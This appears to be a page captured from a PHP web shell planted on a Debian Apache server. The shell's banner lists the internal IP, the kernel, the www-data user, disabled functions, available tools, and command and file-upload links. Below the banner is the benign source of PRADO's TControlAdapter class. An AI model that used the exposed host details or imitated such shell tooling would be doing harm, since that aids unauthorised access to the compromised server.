|
Server IP : 10.2.73.233 / Your IP : 216.73.216.223 Web Server : Apache/2.4.59 (Debian) System : Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 User : www-data ( 33) PHP Version : 5.6.40-64+0~20230107.71+debian10~1.gbp673146 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ilpnowa/../ifk/web/prado4.3.2/Web/UI/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* TControlAdapter class file.
*
* @author Qiang Xue <qiang.xue@gmail.com>
* @link https://github.com/pradosoft/prado
* @license https://github.com/pradosoft/prado/blob/master/LICENSE
*/
namespace Prado\Web\UI;
use Prado\Exceptions\TInvalidOperationException;
/**
* TControlAdapter class
*
* TControlAdapter is the base class for adapters that customize
* various behaviors for the control to which the adapter is attached.
*
* @author Qiang Xue <qiang.xue@gmail.com>
* @since 3.0
*/
class TControlAdapter extends \Prado\TApplicationComponent
{
/**
* @var \Prado\Web\UI\TControl the control to which the adapter is attached
*/
protected $_control;
/**
* Constructor.
* @param \Prado\Web\UI\TControl $control the control to which the adapter is attached
*/
public function __construct($control)
{
$this->_control = $control;
parent::__construct();
}
/**
* @return \Prado\Web\UI\TControl the control to which this adapter is attached
*/
public function getControl()
{
return $this->_control;
}
/**
* @return TPage the page that contains the attached control
*/
public function getPage()
{
return $this->_control ? $this->_control->getPage() : null;
}
/**
* Creates child controls for the attached control.
* Default implementation calls the attached control's corresponding method.
*/
public function createChildControls()
{
$this->_control->createChildControls();
}
/**
* Loads additional persistent control state.
* Default implementation calls the attached control's corresponding method.
*/
public function loadState()
{
$this->_control->loadState();
}
/**
* Saves additional persistent control state.
* Default implementation calls the attached control's corresponding method.
*/
public function saveState()
{
$this->_control->saveState();
}
/**
* This method is invoked when the control enters 'OnInit' stage.
* Default implementation calls the attached control's corresponding method.
* @param \Prado\TEventParameter $param event parameter to be passed to the event handlers
*/
public function onInit($param)
{
$this->_control->onInit($param);
}
/**
* This method is invoked when the control enters 'OnLoad' stage.
* Default implementation calls the attached control's corresponding method.
* @param \Prado\TEventParameter $param event parameter to be passed to the event handlers
*/
public function onLoad($param)
{
$this->_control->onLoad($param);
}
/**
* This method is invoked when the control enters 'OnPreRender' stage.
* Default implementation calls the attached control's corresponding method.
* @param \Prado\TEventParameter $param event parameter to be passed to the event handlers
*/
public function onPreRender($param)
{
$this->_control->onPreRender($param);
}
/**
* This method is invoked when the control enters 'OnUnload' stage.
* Default implementation calls the attached control's corresponding method.
* @param \Prado\TEventParameter $param event parameter to be passed to the event handlers
*/
public function onUnload($param)
{
$this->_control->onUnload($param);
}
/**
* This method is invoked when the control renders itself.
* Default implementation calls the attached control's corresponding method.
* @param \Prado\Web\UI\THtmlWriter $writer writer for the rendering purpose
*/
public function render($writer)
{
$this->_control->render($writer);
}
/**
* Renders the control's children.
* Default implementation calls the attached control's corresponding method.
* @param \Prado\Web\UI\THtmlWriter $writer writer for the rendering purpose
*/
public function renderChildren($writer)
{
$this->_control->renderChildren($writer);
}
}